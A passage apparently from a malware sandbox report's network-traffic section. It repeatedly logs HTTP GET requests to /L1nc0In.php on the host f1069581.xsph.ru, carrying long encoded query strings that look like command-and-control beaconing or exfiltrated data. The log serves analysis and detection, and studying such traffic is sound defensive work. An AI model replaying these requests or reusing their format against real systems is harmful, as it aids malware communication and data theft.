JmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFz